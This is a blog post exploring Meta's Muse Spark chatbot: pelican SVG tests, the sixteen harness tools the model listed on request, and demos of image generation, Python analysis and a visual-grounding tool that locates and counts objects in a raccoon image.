&lt;p&gt;The model is exposed as two different modes on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; - "Instant" and "Thinking". Meta promise a "Contemplating" mode in the future which they say will offer much longer reasoning time and should behave more like Gemini Deep Think or GPT-5.4 Pro.&lt;/p&gt;
&lt;h5 id="a-couple-of-pelicans"&gt;A couple of pelicans&lt;/h5&gt;
&lt;p&gt;I prefer to run &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;my pelican test&lt;/a&gt; via API to avoid being influenced by any invisible system prompts, but since that's not an option I ran it against the chat UI directly.&lt;/p&gt;
&lt;p&gt;Here's the pelican I got for "Instant":&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/muse-spark-instant-pelican.jpg" alt="This is a pretty basic pelican. The bicycle is mangled, the pelican itself has a rectangular beak albeit with a hint of pouch curve below it. Not a very good one." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And this one for "Thinking":&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/muse-spark-thinking-pelican.png" alt="Much better. Clearly a pelican. Bicycle is the correct shape. Pelican is wearing a blue cycling helmet (albeit badly rendered). Not a bad job at all." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Both SVGs were rendered inline by the Meta AI interface. Interestingly, the Instant model &lt;a href="https://gist.github.com/simonw/ea7466204f1001b7d67afcb5d0532f6f"&gt;output an SVG directly&lt;/a&gt; (with code comments) whereas the Thinking model &lt;a href="https://gist.github.com/simonw/bc911a56006ba44b0bf66abf0f872ab2"&gt;wrapped it in a thin HTML shell&lt;/a&gt; with some unused &lt;code&gt;Playables SDK v1.0.0&lt;/code&gt; JavaScript libraries.&lt;/p&gt;
&lt;p&gt;Which got me curious...&lt;/p&gt;
&lt;h5 id="poking-around-with-tools"&gt;Poking around with tools&lt;/h5&gt;
&lt;p&gt;Clearly Meta's chat harness has some tools wired up to it - at the very least it can render SVG and HTML as embedded frames, Claude Artifacts style.&lt;/p&gt;
&lt;p&gt;But what else can it do?&lt;/p&gt;
&lt;p&gt;I asked it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;what tools do you have access to?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And then:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I want the exact tool names, parameter names and tool descriptions, in the original format&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It spat out detailed descriptions of 16 different tools. You can see &lt;a href="https://gist.github.com/simonw/e1ce0acd70443f93dcd6481e716c4304#response-1"&gt;the full list I got back here&lt;/a&gt; - credit to Meta for not telling their bot to hide these, since it's far less frustrating if I can get them out without having to mess around with jailbreaks.&lt;/p&gt;
&lt;p&gt;Here are highlights derived from that response:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Browse and search&lt;/strong&gt;. &lt;code&gt;browser.search&lt;/code&gt; can run a web search through an undisclosed search engine, &lt;code&gt;browser.open&lt;/code&gt; can load the full page from one of those search results and &lt;code&gt;browser.find&lt;/code&gt; can run pattern matches against the returned page content.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Meta content search&lt;/strong&gt;. &lt;code&gt;meta_1p.content_search&lt;/code&gt; can run "Semantic search across Instagram, Threads, and Facebook posts" - but only for posts the user has access to view which were created since 2025-01-01. This tool has some powerful looking parameters, including &lt;code&gt;author_ids&lt;/code&gt;, &lt;code&gt;key_celebrities&lt;/code&gt;, &lt;code&gt;commented_by_user_ids&lt;/code&gt;, and &lt;code&gt;liked_by_user_ids&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;"Catalog search"&lt;/strong&gt; - &lt;code&gt;meta_1p.meta_catalog_search&lt;/code&gt; can "Search for products in Meta's product catalog", presumably for the "Shopping" option in the Meta AI model selector.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Image generation&lt;/strong&gt;. &lt;code&gt;media.image_gen&lt;/code&gt; generates images from prompts, and "returns a CDN URL and saves the image to the sandbox". It has modes "artistic" and "realistic" and can return "square", "vertical" or "landscape" images.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.python_execution&lt;/strong&gt; - yes! It's &lt;a href="https://simonwillison.net/tags/code-interpreter/"&gt;Code Interpreter&lt;/a&gt;, my favourite feature of both ChatGPT and Claude.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Execute Python code in a remote sandbox environment. Python 3.9 with pandas, numpy, matplotlib, plotly, scikit-learn, PyMuPDF, Pillow, OpenCV, etc. Files persist at &lt;code&gt;/mnt/data/&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Python 3.9 &lt;a href="https://devguide.python.org/versions/"&gt;is EOL&lt;/a&gt; these days but the library collection looks useful.&lt;/p&gt;
&lt;p&gt;I prompted "use python code to confirm sqlite version and python version" and got back Python 3.9.25 and SQLite 3.34.1 (from &lt;a href="https://sqlite.org/releaselog/3_34_1.html"&gt;January 2021&lt;/a&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.create_web_artifact&lt;/strong&gt; - we saw this earlier with the HTML wrapper around the pelican: Meta AI can create HTML+JavaScript files in its container which can then be served up as secure sandboxed iframe interactives. "Set kind to &lt;code&gt;html&lt;/code&gt; for websites/apps or &lt;code&gt;svg&lt;/code&gt; for vector graphics."&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.download_meta_1p_media&lt;/strong&gt; is interesting: "Download media from Meta 1P sources into the sandbox. Use post_id for Instagram/Facebook/Threads posts, or &lt;code&gt;catalog_search_citation_id&lt;/code&gt; for catalog product images". So it looks like you can pull in content from other parts of Meta and then do fun Code Interpreter things to it in the sandbox.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.file_search&lt;/strong&gt; - "Search uploaded files in this conversation and return relevant excerpts" - I guess for digging through PDFs and similar?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tools for editing files in the container&lt;/strong&gt; - &lt;code&gt;container.view&lt;/code&gt;, &lt;code&gt;container.insert&lt;/code&gt; (with &lt;code&gt;new_str&lt;/code&gt; and &lt;code&gt;insert_line&lt;/code&gt;), &lt;code&gt;container.str_replace&lt;/code&gt;. These look similar to Claude's &lt;a href="https://platform.claude.com/docs/en/agents-and-tools/tool-use/text-editor-tool#text-editor-tool-commands"&gt;text editor tool commands&lt;/a&gt; - these are becoming a common pattern across any file-equipped agent harness.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.visual_grounding&lt;/strong&gt; - see below, this one is &lt;em&gt;fun&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;subagents.spawn_agent&lt;/strong&gt; - the &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/subagents/"&gt;sub-agent as a tool&lt;/a&gt; pattern. "Spawn an independent sub-agent for research, analysis, or delegation. It returns its final text response."&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;third_party.link_third_party_account&lt;/strong&gt; - "Initiate account linking for a third-party service", currently Google Calendar, Outlook Calendar, Gmail, or Outlook.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="image-analysis-in-the-container"&gt;Image analysis in the container&lt;/h4&gt;
&lt;p&gt;Let's talk about that &lt;code&gt;container.visual_grounding&lt;/code&gt; one. Here's the description in full:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Visual grounding tool that analyzes the image, identifies and labels objects, locates regions, or counts objects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Parameters:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;object_names&lt;/strong&gt; (array, required)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;image_path&lt;/strong&gt; (string, default "")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;format_type&lt;/strong&gt; ("bbox"|"point"|"count"|null, default "bbox")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;title&lt;/strong&gt; (string|null)[string]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;So it can take an image path, optional object names and return things in format &lt;code&gt;bbox&lt;/code&gt;, &lt;code&gt;point&lt;/code&gt; or &lt;code&gt;count&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This sounded to me like Meta's &lt;a href="https://github.com/facebookresearch/segment-anything"&gt;Segment Anything&lt;/a&gt;, (&lt;em&gt;I later heard that it's not, this is a native feature of the model itself via a tool call with a custom system prompt&lt;/em&gt;). I decided to take it for a spin.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prompt&lt;/strong&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;generate a photo of a raccoon sitting on a trash can wearing trash as a hat&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here you go — king of the alley, in full regalia:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-raccoon-trash-hat.jpg" alt="It's a photo of a raccoon wearing a disposable coffee cup and some newspaper and banana peel as a hat. It's pretty good" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Coffee cup crown, banana peel brim, newspaper feather. Peak raccoon fashion. Want me to make a wilder version — maybe night-vision, or wearing sunglasses too?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My guess is that image generation in Meta AI is powered by their &lt;a href="https://arxiv.org/abs/2309.15807"&gt;Emu model&lt;/a&gt;, or an updated version of it. This is the same pattern as ChatGPT and Gemini image generation, where images are generated by a tool call (here that's &lt;code&gt;media.image_gen&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;image_gen&lt;/code&gt; tool description said that it "saves the image to the sandbox", so my guess was that I'd then be able to run Python code against it. I tried:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;use python OpenCV to analyze that image and find out neat things about it&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Annoyingly it did &lt;em&gt;not&lt;/em&gt; show me the code it ran, but it did create this image:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/raccoon_analysis.png" alt="OpenCV image analysis dashboard titled &amp;quot;OpenCV Analysis: Raccoon Trash Hat&amp;quot; with four panels: top-left shows the original 1280x1280 photo of a raccoon wearing a trash-lid hat with a coffee cup and newspaper on top in an alley; top-right shows a Canny edge detection version with white edges on black background labeled &amp;quot;Canny Edges - 4.6% density&amp;quot;; bottom-left shows &amp;quot;Top 5 Dominant Colors&amp;quot; as swatches with values RGB(20, 19, 24): 35.3%, RGB(43, 43, 47): 34.2%, RGB(84, 80, 79): 18.3%, RGB(139, 135, 131): 6.3%, RGB(210, 213, 208): 5.8%; bottom-right shows &amp;quot;Color Histograms&amp;quot; line chart with Red, Green, and Blue channels plotted from 0-250 on x-axis and 0-35000 on y-axis, peaking around value 25-50." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Pretty neat! We can both generate images and then use them with Python tools.&lt;/p&gt;
&lt;p&gt;Next, the &lt;code&gt;visual_grounding&lt;/code&gt; tool. Knowing the names of the tools makes it easy to refer to them in prompts:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now try the container.visual_grounding tool&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The response (&lt;a href="https://gist.github.com/simonw/72d64b325d33e5882b9818d825551b44"&gt;full response here&lt;/a&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Done — visual_grounding pinpointed every piece of the outfit with pixel-level precision:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-grounding.jpg" alt="Visual grounding analysis of a raccoon photo titled &amp;quot;Visual Grounding: Found 8 objects&amp;quot; with colored dot annotations on the image marking each detected object: coffee cup (515,205) in yellow, banana peel (569,261) in light yellow, newspaper (399,279) in blue, right eye (461,396) in magenta, left eye (582,397) in pink, nose (514,472) in cyan, raccoon (553,548) in green, and trash can lid (550,892) in red. A legend at the bottom lists all objects with their normalized 0-1000 coordinates. Footer text reads &amp;quot;Coordinates are 0-1000 normalized. visual_grounding returned precise points for each component of the trash hat ensemble.&amp;quot; Watermark reads &amp;quot;Meta AI&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Want me to run it in bbox mode next to draw boxes around the fur texture, or count mode to see how many individual whiskers it can detect?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once again, Meta AI wrapped the results from the tool in a custom HTML visualization. That's clearly &lt;code&gt;point&lt;/code&gt; mode, but how about the others?&lt;/p&gt;
&lt;p&gt;I prompted:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;yes draw bounding boxes, can it do masks too?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Response:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yes — bounding boxes work great. Masks? Not directly in &lt;code&gt;visual_grounding&lt;/code&gt;; it only returns three formats: point, bbox, and count. No pixel-level segmentation masks.&lt;/p&gt;
&lt;p&gt;Here's the bbox output:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-bbox.jpg" alt="Bounding box object detection visualization titled &amp;quot;Bounding Boxes (visual_grounding)&amp;quot; with subtitle &amp;quot;8 objects detected — coordinates are 0-1000 normalized&amp;quot; showing a raccoon photo with colored rectangular bounding boxes around detected objects: coffee cup in yellow [424,115,610,273] 186×158, banana peel in yellow [472,215,667,291] 195×76, newspaper in blue [305,223,548,315] 243×92, raccoon in green [270,240,892,845] 622×605, raccoon's face in purple [305,283,750,537] 445×254, right eye in magenta [442,379,489,413] 47×34, left eye in magenta [565,379,605,416] 40×37, and trash can lid in red [107,800,1000,998] 893×198. A legend at the bottom shows each object's name, coordinates, and pixel dimensions in colored cards. Watermark reads &amp;quot;Meta AI&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;What you’re seeing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;raccoon&lt;/strong&gt;: big box from (270,240) to (892,845) — covers 62% of the width, basically the whole animal&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;coffee cup&lt;/strong&gt;: (424,115)-(610,273) — sits highest, 158px tall in the 0-1000 space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;banana peel&lt;/strong&gt;: (472,215)-(667,291) — overlaps the cup's base, confirming it's draped over the side&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;newspaper&lt;/strong&gt;: (305,223)-(548,315) — left ear coverage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;trash can lid&lt;/strong&gt;: (107,800)-(1000,998) — spans almost the full image width at the bottom&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;face&lt;/strong&gt;: (305,283)-(750,537) — tight crop around the mask&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eyes&lt;/strong&gt;: both ~40×37 pixel boxes, perfectly level at y=379&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice how the boxes nest: face is inside raccoon, eyes inside face, hat pieces overlap each other but stay above the face box. The tool is doing real object localization, not just guessing centers.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;About masks:&lt;/strong&gt; since visual_grounding doesn't output them, I can fake them with OpenCV in the container. Two quick options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;GrabCut&lt;/strong&gt; — I give it the raccoon bbox, it iteratively segments fur from background and returns a binary mask&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SAM-style color threshold&lt;/strong&gt; — use the bbox plus k-means to isolate the coffee cup or banana peel&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Want me to generate an actual alpha mask for the raccoon (cut it out from the alley), or for the trash hat pieces separately? Takes about 10 seconds and I can give you a transparent PNG.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's &lt;a href="https://static.simonwillison.net/static/2026/meta-bbox.html"&gt;the HTML for that bbox visualization&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Finally I had it dump out the raw JSON for point mode, bbox mode and count mode. You can &lt;a href="https://gist.github.com/simonw/26bfdb22d7d73450c13f49abbf0c251a"&gt;see that all here&lt;/a&gt;. The count mode is particularly interesting - here's that in full:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;[
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;raccoon whisker&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;403&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;445&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;397&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;458&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;392&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;472&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;391&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;485&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;398&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;497&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;415&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;512&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;618&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;446&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;622&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;461&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;625&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;475&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;628&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;488&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;635&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;501&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;651&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;518&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;12&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;raccoon paw claw&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;406&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;845&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;424&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;847&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;441&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;842&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;473&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;833&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;596&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;830&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;635&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;844&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;660&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;843&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;679&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;838&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;8&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;trash item on head&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;514&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;191&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;568&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;263&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;392&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;274&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;3&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;eye&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;462&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;395&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;582&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;398&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;2&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;ear&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;359&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;313&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;680&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;294&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;2&lt;/span&gt;
  }
]&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So Meta AI has the ability to count a raccoon's whiskers baked into the default set of tools.&lt;/p&gt;
&lt;p&gt;Which means... it can count pelicans too!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-count-pelicans.jpg" alt="Screenshot of a Meta AI conversation where the user uploaded a photo of pelicans on rocks and asked &amp;quot;Count the pelicans&amp;quot;. response reads: &amp;quot;That rocky haul-out is packed — I count 25 brown pelicans in your photo. I went bird by bird, including the ones tucked behind rocks, heads turned away, or just peeking out at the edges. They're all California brown pelicans, with those pale yellow heads and long bills, clustered on the riprap right at the waterline. To make it easy to verify, I've numbered each one on the image:&amp;quot; followed by an annotated version of the photo with red numbered circles (1–25) placed on each pelican. The annotated image has a downward chevron and an &amp;quot;Open&amp;quot; button at the bottom right." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Here's that overlay &lt;a href="https://static.simonwillison.net/static/2026/meta-count-pelicans.html"&gt;exported as HTML&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;strong&gt;Update&lt;/strong&gt;: Meta's &lt;a href="https://twitter.com/jacktripleu/status/2042050863800447387"&gt;Jack Wu confirms&lt;/a&gt; that these tools are part of the new harness they launched alongside the new model.&lt;/em&gt;&lt;/p&gt;

&lt;h4 id="maybe-open-weights-in-the-future-"&gt;Maybe open weights in the future?&lt;/h4&gt;
&lt;p&gt;On Twitter &lt;a href="https://twitter.com/alexandr_wang/status/2041909388852748717"&gt;Alexandr Wang said&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;this is step one. bigger models are already in development with infrastructure scaling to match. private api preview open to select partners today, with plans to open-source future versions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I really hope they do go back to open-sourcing their models. Llama 3.1/3.2/3.3 were excellent laptop-scale model families, and the introductory blog post for Muse Spark had this to say about efficiency:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[...] we can reach the same capabilities with over an order of magnitude less compute than our previous model, Llama 4 Maverick. This improvement also makes Muse Spark significantly more efficient than the leading base models available for comparison.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So are Meta back in the frontier model game? &lt;a href="https://twitter.com/ArtificialAnlys/status/2041913043379220801"&gt;Artificial Analysis&lt;/a&gt; think so - they scored Meta Spark at 52, "behind only Gemini 3.1 Pro, GPT-5.4, and Claude Opus 4.6". Last year's Llama 4 Maverick and Scout scored 18 and 13 respectively.&lt;/p&gt;
&lt;p&gt;I'm waiting for API access - while the tool collection on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; is quite strong the real test of a model like this is still what we can build on top of it.&lt;/p&gt;
    
